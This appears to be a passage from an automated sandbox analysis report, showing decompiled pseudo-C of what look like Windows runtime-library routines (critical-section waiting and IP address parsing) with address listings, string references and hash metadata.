                                                                                                                                                                                    							if(_t67 > 2) {
                                                                                                                                                                                    								__eflags = _t85 - 0x9220c0;
                                                                                                                                                                                    								if(_t85 != 0x9220c0) {
                                                                                                                                                                                    									_t76 = _a4;
                                                                                                                                                                                    									__eflags = _a4 - _a8;
                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                    										E008C217A(_t71, __eflags, _t85);
                                                                                                                                                                                    									}
                                                                                                                                                                                    								}
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_push("RTL: Re-Waiting\n");
                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                    							_push(0x65);
                                                                                                                                                                                    							_a8 = _a4;
                                                                                                                                                                                    							E00893F92();
                                                                                                                                                                                    							_t91 = _t93 + 0xc;
                                                                                                                                                                                    							__eflags =  *0x7ffe0382;
                                                                                                                                                                                    							if( *0x7ffe0382 != 0) {
                                                                                                                                                                                    								goto L21;
                                                                                                                                                                                    							}
                                                                                                                                                                                    						}
                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                    					}
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					return _t40;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				L36:
                                                                                                                                                                                    			}

































                                                                                                                                                                                    0x0086ec56
                                                                                                                                                                                    0x0086ec56
                                                                                                                                                                                    0x0086ec56
                                                                                                                                                                                    0x0086ec5c
                                                                                                                                                                                    0x0086ec64
                                                                                                                                                                                    0x008a23e6
                                                                                                                                                                                    0x008a23eb
                                                                                                                                                                                    0x008a23eb
                                                                                                                                                                                    0x0086ec6a
                                                                                                                                                                                    0x0086ec6c
                                                                                                                                                                                    0x0086ec6f
                                                                                                                                                                                    0x008a23f3
                                                                                                                                                                                    0x008a23f8
                                                                                                                                                                                    0x008a23fa
                                                                                                                                                                                    0x008a23fc
                                                                                                                                                                                    0x0086ec75
                                                                                                                                                                                    0x0086ec76
                                                                                                                                                                                    0x0086ec76
                                                                                                                                                                                    0x0086ec7b
                                                                                                                                                                                    0x0086ec7c
                                                                                                                                                                                    0x0086ec7e
                                                                                                                                                                                    0x008a2406
                                                                                                                                                                                    0x008a2407
                                                                                                                                                                                    0x008a240c
                                                                                                                                                                                    0x008a240d
                                                                                                                                                                                    0x008a240d
                                                                                                                                                                                    0x008a240d
                                                                                                                                                                                    0x008a2414
                                                                                                                                                                                    0x008a2417
                                                                                                                                                                                    0x008a241e
                                                                                                                                                                                    0x008a2435
                                                                                                                                                                                    0x008a2438
                                                                                                                                                                                    0x008a243c
                                                                                                                                                                                    0x008a243f
                                                                                                                                                                                    0x008a2442
                                                                                                                                                                                    0x008a2443
                                                                                                                                                                                    0x008a2446
                                                                                                                                                                                    0x008a2449
                                                                                                                                                                                    0x008a2453
                                                                                                                                                                                    0x008a2455
                                                                                                                                                                                    0x008a245b
                                                                                                                                                                                    0x008a245b
                                                                                                                                                                                    0x0086eb99
                                                                                                                                                                                    0x0086eb99
                                                                                                                                                                                    0x0086eb9c
                                                                                                                                                                                    0x0086eb9d
                                                                                                                                                                                    0x0086eb9f
                                                                                                                                                                                    0x0086eba2
                                                                                                                                                                                    0x008a2465
                                                                                                                                                                                    0x008a246b
                                                                                                                                                                                    0x008a246d
                                                                                                                                                                                    0x0086eba8
                                                                                                                                                                                    0x0086eba9
                                                                                                                                                                                    0x0086eba9
                                                                                                                                                                                    0x0086ebae
                                                                                                                                                                                    0x0086ebb3
                                                                                                                                                                                    0x0086ebb9
                                                                                                                                                                                    0x0086ebbb
                                                                                                                                                                                    0x008a2513
                                                                                                                                                                                    0x008a2514
                                                                                                                                                                                    0x008a2519
                                                                                                                                                                                    0x008a251b
                                                                                                                                                                                    0x0086ec2a
                                                                                                                                                                                    0x0086ec2d
                                                                                                                                                                                    0x0086ec33
                                                                                                                                                                                    0x0086ec36
                                                                                                                                                                                    0x0086ec3a
                                                                                                                                                                                    0x0086ec3e
                                                                                                                                                                                    0x0086ec40
                                                                                                                                                                                    0x0086ec47
                                                                                                                                                                                    0x0086ec47
                                                                                                                                                                                    0x0086ec40
                                                                                                                                                                                    0x008422c6
                                                                                                                                                                                    0x0086ebc1
                                                                                                                                                                                    0x0086ebc1
                                                                                                                                                                                    0x0086ebc5
                                                                                                                                                                                    0x0086ec9a
                                                                                                                                                                                    0x0086ec9a
                                                                                                                                                                                    0x0086ebd6
                                                                                                                                                                                    0x0086ebd6
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0086ebbb
                                                                                                                                                                                    0x008a2477
                                                                                                                                                                                    0x008a247c
                                                                                                                                                                                    0x008a2486
                                                                                                                                                                                    0x008a248b
                                                                                                                                                                                    0x008a2496
                                                                                                                                                                                    0x008a249b
                                                                                                                                                                                    0x008a249d
                                                                                                                                                                                    0x008a24a0
                                                                                                                                                                                    0x008a24a3
                                                                                                                                                                                    0x008a24aa
                                                                                                                                                                                    0x008a24aa
                                                                                                                                                                                    0x008a24a5
                                                                                                                                                                                    0x008a24a5
                                                                                                                                                                                    0x008a24a5
                                                                                                                                                                                    0x008a24ac
                                                                                                                                                                                    0x008a24af
                                                                                                                                                                                    0x008a24b0
                                                                                                                                                                                    0x008a24b3
                                                                                                                                                                                    0x008a24b9
                                                                                                                                                                                    0x008a24ba
                                                                                                                                                                                    0x008a24bb
                                                                                                                                                                                    0x008a24c6
                                                                                                                                                                                    0x008a24cb
                                                                                                                                                                                    0x008a24cd
                                                                                                                                                                                    0x008a24d0
                                                                                                                                                                                    0x008a24d1
                                                                                                                                                                                    0x008a24d4
                                                                                                                                                                                    0x008a24d6
                                                                                                                                                                                    0x008a24d9
                                                                                                                                                                                    0x008a24d9
                                                                                                                                                                                    0x008a24dc
                                                                                                                                                                                    0x008a24df
                                                                                                                                                                                    0x008a24e1
                                                                                                                                                                                    0x008a24e7
                                                                                                                                                                                    0x008a24e9
                                                                                                                                                                                    0x008a24ec
                                                                                                                                                                                    0x008a24ef
                                                                                                                                                                                    0x008a24f2
                                                                                                                                                                                    0x008a24f2
                                                                                                                                                                                    0x008a24ef
                                                                                                                                                                                    0x008a24e7
                                                                                                                                                                                    0x008a24fa
                                                                                                                                                                                    0x008a24ff
                                                                                                                                                                                    0x008a2501
                                                                                                                                                                                    0x008a2503
                                                                                                                                                                                    0x008a2506
                                                                                                                                                                                    0x008a250b
                                                                                                                                                                                    0x0086eb8c
                                                                                                                                                                                    0x0086eb93
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0086eb93
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0086eb99
                                                                                                                                                                                    0x0086ec85
                                                                                                                                                                                    0x0086ec85
                                                                                                                                                                                    0x0086ec85
                                                                                                                                                                                    0x00000000

                                                                                                                                                                                    Strings
                                                                                                                                                                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 008A24BD
                                                                                                                                                                                    • RTL: Re-Waiting, xrefs: 008A24FA
                                                                                                                                                                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 008A248D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                                                    • API String ID: 0-3177188983
                                                                                                                                                                                    • Opcode ID: 527a6db6e530137deebc86510a2bf2dce64f1c1e9be2c672f8e75962c08dbba0
                                                                                                                                                                                    • Instruction ID: fb35fb4b4d32b0e6d079d4938f495709c96b3e66186b61ee30ebb3c56d424afc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 527a6db6e530137deebc86510a2bf2dce64f1c1e9be2c672f8e75962c08dbba0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 18410570A00208ABDB34EBACCC85F6A77A8FF49720F208605F515EB6D1D674E94187A5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                    			E0087FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                    				signed int _t105;
                                                                                                                                                                                    				void* _t110;
                                                                                                                                                                                    				char _t114;
                                                                                                                                                                                    				short _t115;
                                                                                                                                                                                    				void* _t118;
                                                                                                                                                                                    				signed short* _t119;
                                                                                                                                                                                    				short _t120;
                                                                                                                                                                                    				char _t122;
                                                                                                                                                                                    				void* _t127;
                                                                                                                                                                                    				void* _t130;
                                                                                                                                                                                    				signed int _t136;
                                                                                                                                                                                    				intOrPtr _t143;
                                                                                                                                                                                    				signed int _t158;
                                                                                                                                                                                    				signed short* _t164;
                                                                                                                                                                                    				signed int _t167;
                                                                                                                                                                                    				void* _t170;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t158 = 0;
                                                                                                                                                                                    				_t164 = _a4;
                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                    				_t136 = 0;
                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                    					_t167 =  *_t164 & 0x0000ffff;
                                                                                                                                                                                    					if(_t167 == _t158) {
                                                                                                                                                                                    						break;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t118 = _v20 - _t158;
                                                                                                                                                                                    					if(_t118 == 0) {
                                                                                                                                                                                    						if(_t167 == 0x3a) {
                                                                                                                                                                                    							if(_v12 > _t158 || _v8 > _t158) {
                                                                                                                                                                                    								break;
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_t119 =  &(_t164[1]);
                                                                                                                                                                                    								if( *_t119 != _t167) {
                                                                                                                                                                                    									break;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								_t143 = 2;
                                                                                                                                                                                    								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                                                    								_v28 = 1;
                                                                                                                                                                                    								_v8 = _t143;
                                                                                                                                                                                    								_t136 = _t136 + 1;
                                                                                                                                                                                    								L47:
                                                                                                                                                                                    								_t164 = _t119;
                                                                                                                                                                                    								_v20 = _t143;
                                                                                                                                                                                    								L14:
                                                                                                                                                                                    								if(_v24 == _t158) {
                                                                                                                                                                                    									L19:
                                                                                                                                                                                    									_t164 =  &(_t164[1]);
                                                                                                                                                                                    									_t158 = 0;
                                                                                                                                                                                    									continue;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								if(_v12 == _t158) {
                                                                                                                                                                                    									if(_v16 > 4) {
                                                                                                                                                                                    										L29:
                                                                                                                                                                                    										return 0xc000000d;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_t120 = E0087EE02(_v24, _t158, 0x10);
                                                                                                                                                                                    									_t170 = _t170 + 0xc;
                                                                                                                                                                                    									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                                                                                                                                    									_t136 = _t136 + 1;
                                                                                                                                                                                    									goto L19;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								if(_v16 > 3) {
                                                                                                                                                                                    									goto L29;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								_t122 = E0087EE02(_v24, _t158, 0xa);
                                                                                                                                                                                    								_t170 = _t170 + 0xc;
                                                                                                                                                                                    								if(_t122 > 0xff) {
                                                                                                                                                                                    									goto L29;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                                                                                                                                    								goto L19;
                                                                                                                                                                                    							}
                                                                                                                                                                                    						}
                                                                                                                                                                                    						L21:
                                                                                                                                                                                    						if(_v8 > 7 || _t167 >= 0x80) {
                                                                                                                                                                                    							break;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							if(E0087685D(_t167, 4) == 0) {
                                                                                                                                                                                    								if(E0087685D(_t167, 0x80) != 0) {
                                                                                                                                                                                    									if(_v12 > 0) {
                                                                                                                                                                                    										break;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_t127 = 1;
                                                                                                                                                                                    									_a7 = 1;
                                                                                                                                                                                    									_v24 = _t164;
                                                                                                                                                                                    									_v20 = 1;
                                                                                                                                                                                    									_v16 = 1;
                                                                                                                                                                                    									L36:
                                                                                                                                                                                    									if(_v20 == _t127) {
                                                                                                                                                                                    										goto L19;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_t158 = 0;
                                                                                                                                                                                    									goto L14;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								break;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_a7 = 0;
                                                                                                                                                                                    							_v24 = _t164;
                                                                                                                                                                                    							_v20 = 1;
                                                                                                                                                                                    							_v16 = 1;
                                                                                                                                                                                    							goto L19;
                                                                                                                                                                                    						}
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t130 = _t118 - 1;
                                                                                                                                                                                    					if(_t130 != 0) {
                                                                                                                                                                                    						if(_t130 == 1) {
                                                                                                                                                                                    							goto L21;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t127 = 1;
                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					if(_t167 >= 0x80) {
                                                                                                                                                                                    						L7:
                                                                                                                                                                                    						if(_t167 == 0x3a) {
                                                                                                                                                                                    							_t158 = 0;
                                                                                                                                                                                    							if(_v12 > 0 || _v8 > 6) {
                                                                                                                                                                                    								break;
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_t119 =  &(_t164[1]);
                                                                                                                                                                                    								if( *_t119 != _t167) {
                                                                                                                                                                                    									_v8 = _v8 + 1;
                                                                                                                                                                                    									L13:
                                                                                                                                                                                    									_v20 = _t158;
                                                                                                                                                                                    									goto L14;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								if(_v28 != 0) {
                                                                                                                                                                                    									break;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								_v28 = _v8 + 1;
                                                                                                                                                                                    								_t143 = 2;
                                                                                                                                                                                    								_v8 = _v8 + _t143;
                                                                                                                                                                                    								goto L47;
                                                                                                                                                                                    							}
                                                                                                                                                                                    						}
                                                                                                                                                                                    						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                                                                                                                                    							break;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							_v12 = _v12 + 1;
                                                                                                                                                                                    							_t158 = 0;
                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                    						}
                                                                                                                                                                                    					}
                                                                                                                                                                                    					if(E0087685D(_t167, 4) != 0) {
                                                                                                                                                                                    						_v16 = _v16 + 1;
                                                                                                                                                                                    						goto L19;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					if(E0087685D(_t167, 0x80) != 0) {
                                                                                                                                                                                    						_v16 = _v16 + 1;
                                                                                                                                                                                    						if(_v12 > 0) {
                                                                                                                                                                                    							break;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_a7 = 1;
                                                                                                                                                                                    						goto L19;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				 *_a8 = _t164;
                                                                                                                                                                                    				if(_v12 != 0) {
                                                                                                                                                                                    					if(_v12 != 3) {
                                                                                                                                                                                    						goto L29;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_v8 = _v8 + 1;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				if(_v28 != 0 || _v8 == 7) {
                                                                                                                                                                                    					if(_v20 != 1) {
                                                                                                                                                                                    						if(_v20 != 2) {
                                                                                                                                                                                    							goto L29;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                                                    						L65:
                                                                                                                                                                                    						_t105 = _v28;
                                                                                                                                                                                    						if(_t105 != 0) {
                                                                                                                                                                                    							_t98 = (_t105 - _v8) * 2; // 0x11
                                                                                                                                                                                    							E00858980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                                                                                                                                                    							_t110 = 8;
                                                                                                                                                                                    							E0084DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                                                                                                                                                    						}
                                                                                                                                                                                    						return 0;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                                                    						if(_v16 > 3) {
                                                                                                                                                                                    							goto L29;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t114 = E0087EE02(_v24, 0, 0xa);
                                                                                                                                                                                    						_t170 = _t170 + 0xc;
                                                                                                                                                                                    						if(_t114 > 0xff) {
                                                                                                                                                                                    							goto L29;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                                                                                                                                                    						goto L65;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					if(_v16 > 4) {
                                                                                                                                                                                    						goto L29;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t115 = E0087EE02(_v24, 0, 0x10);
                                                                                                                                                                                    					_t170 = _t170 + 0xc;
                                                                                                                                                                                    					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                                                                                                                                                    					goto L65;
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					goto L29;
                                                                                                                                                                                    				}
                                                                                                                                                                                    			}

























                                                                                                                                                                                    0x0087fcd1
                                                                                                                                                                                    0x0087fcd6
                                                                                                                                                                                    0x0087fcd9
                                                                                                                                                                                    0x0087fcdc
                                                                                                                                                                                    0x0087fcdf
                                                                                                                                                                                    0x0087fce2
                                                                                                                                                                                    0x0087fce5
                                                                                                                                                                                    0x0087fce8
                                                                                                                                                                                    0x0087fceb
                                                                                                                                                                                    0x0087fced
                                                                                                                                                                                    0x0087fced
                                                                                                                                                                                    0x0087fcf3
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0087fcfc
                                                                                                                                                                                    0x0087fcfe
                                                                                                                                                                                    0x0087fdc1
                                                                                                                                                                                    0x008aecbd
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aeccc
                                                                                                                                                                                    0x008aeccc
                                                                                                                                                                                    0x008aecd2
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aecdf
                                                                                                                                                                                    0x008aece0
                                                                                                                                                                                    0x008aece4
                                                                                                                                                                                    0x008aeceb
                                                                                                                                                                                    0x008aecee
                                                                                                                                                                                    0x008aeca8
                                                                                                                                                                                    0x008aeca8
                                                                                                                                                                                    0x008aecaa
                                                                                                                                                                                    0x0087fd76
                                                                                                                                                                                    0x0087fd79
                                                                                                                                                                                    0x0087fdb4
                                                                                                                                                                                    0x0087fdb5
                                                                                                                                                                                    0x0087fdb6
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0087fdb6
                                                                                                                                                                                    0x0087fd7e
                                                                                                                                                                                    0x008aecfc
                                                                                                                                                                                    0x0087fe2f
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0087fe2f
                                                                                                                                                                                    0x008aed08
                                                                                                                                                                                    0x008aed0f
                                                                                                                                                                                    0x008aed17
                                                                                                                                                                                    0x008aed1b
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aed1b
                                                                                                                                                                                    0x0087fd88
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0087fd94
                                                                                                                                                                                    0x0087fd99
                                                                                                                                                                                    0x0087fda1
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0087fdb0
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0087fdb0
                                                                                                                                                                                    0x008aecbd
                                                                                                                                                                                    0x0087fdc7
                                                                                                                                                                                    0x0087fdcb
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0087fdd7
                                                                                                                                                                                    0x0087fde3
                                                                                                                                                                                    0x0087fe06
                                                                                                                                                                                    0x00891fe7
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00891fef
                                                                                                                                                                                    0x00891ff0
                                                                                                                                                                                    0x00891ff4
                                                                                                                                                                                    0x00891ff7
                                                                                                                                                                                    0x00891ffa
                                                                                                                                                                                    0x00891ffd
                                                                                                                                                                                    0x00892000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aecf1
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aecf1
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0087fe06
                                                                                                                                                                                    0x0087fde8
                                                                                                                                                                                    0x0087fdec
                                                                                                                                                                                    0x0087fdef
                                                                                                                                                                                    0x0087fdf2
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0087fdf2
                                                                                                                                                                                    0x0087fdcb
                                                                                                                                                                                    0x0087fd04
                                                                                                                                                                                    0x0087fd05
                                                                                                                                                                                    0x008aec67
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aec6f
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aec6f
                                                                                                                                                                                    0x0087fd13
                                                                                                                                                                                    0x0087fd3c
                                                                                                                                                                                    0x0087fd40
                                                                                                                                                                                    0x008aec75
                                                                                                                                                                                    0x008aec7a
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aec8a
                                                                                                                                                                                    0x008aec8a
                                                                                                                                                                                    0x008aec90
                                                                                                                                                                                    0x008aecb2
                                                                                                                                                                                    0x0087fd73
                                                                                                                                                                                    0x0087fd73
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0087fd73
                                                                                                                                                                                    0x008aec95
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aeca1
                                                                                                                                                                                    0x008aeca4
                                                                                                                                                                                    0x008aeca5
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aeca5
                                                                                                                                                                                    0x008aec7a
                                                                                                                                                                                    0x0087fd4a
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0087fd6e
                                                                                                                                                                                    0x0087fd6e
                                                                                                                                                                                    0x0087fd71
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0087fd71
                                                                                                                                                                                    0x0087fd4a
                                                                                                                                                                                    0x0087fd21
                                                                                                                                                                                    0x0088a3a1
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0088a3a1
                                                                                                                                                                                    0x0087fd36
                                                                                                                                                                                    0x0089200b
                                                                                                                                                                                    0x00892012
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00892018
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00892018
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0087fd36
                                                                                                                                                                                    0x0087fe0f
                                                                                                                                                                                    0x0087fe16
                                                                                                                                                                                    0x0088a3ad
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0088a3b3
                                                                                                                                                                                    0x0088a3b3
                                                                                                                                                                                    0x0087fe1f
                                                                                                                                                                                    0x008aed25
                                                                                                                                                                                    0x008aed86
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aed91
                                                                                                                                                                                    0x008aed95
                                                                                                                                                                                    0x008aed95
                                                                                                                                                                                    0x008aed9a
                                                                                                                                                                                    0x008aedad
                                                                                                                                                                                    0x008aedb3
                                                                                                                                                                                    0x008aedba
                                                                                                                                                                                    0x008aedc4
                                                                                                                                                                                    0x008aedc9
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aedcc
                                                                                                                                                                                    0x008aed2a
                                                                                                                                                                                    0x008aed55
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aed61
                                                                                                                                                                                    0x008aed66
                                                                                                                                                                                    0x008aed6e
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aed7d
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aed7d
                                                                                                                                                                                    0x008aed30
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aed3c
                                                                                                                                                                                    0x008aed43
                                                                                                                                                                                    0x008aed4b
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __fassign
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3965848254-0
                                                                                                                                                                                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                                    • Instruction ID: 558b2162ed6b93d0ba3fbfac3104352c126bb81a5c0d458ea2e27ef3e8345b7c
                                                                                                                                                                                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E919032D0020AEBDF24DF59C8456AEBBB0FF55318F24C47AD519EA157E7309A81CB91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                    			E0087FE4F(void* __edx, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                    				char _v52;
                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                    				signed int _t15;
                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                    				intOrPtr* _t38;
                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                    				signed int _t43;
                                                                                                                                                                                    				void* _t44;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t37 = __edx;
                                                                                                                                                                                    				_t15 =  *0x922088; // 0x77746b57
                                                                                                                                                                                    				_v8 = _t15 ^ _t43;
                                                                                                                                                                                    				_t17 = _a4;
                                                                                                                                                                                    				_t31 = _a12;
                                                                                                                                                                                    				_t38 = _a16;
                                                                                                                                                                                    				if(_a4 == 0 || _t38 == 0) {
                                                                                                                                                                                    					L7:
                                                                                                                                                                                    					_t18 = 0xc000000d;
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					if(_t31 == 0) {
                                                                                                                                                                                    						if( *_t38 == _t31) {
                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							goto L7;
                                                                                                                                                                                    						}
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						L3:
                                                                                                                                                                                    						_t40 = E0087FED6(_t17,  &_v52);
                                                                                                                                                                                    						if(_a8 != 0) {
                                                                                                                                                                                    							_t26 = E00877707(_t40,  &_v8 - _t40 >> 1, L":%u", _a8 & 0x0000ffff);
                                                                                                                                                                                    							_t44 = _t44 + 0x10;
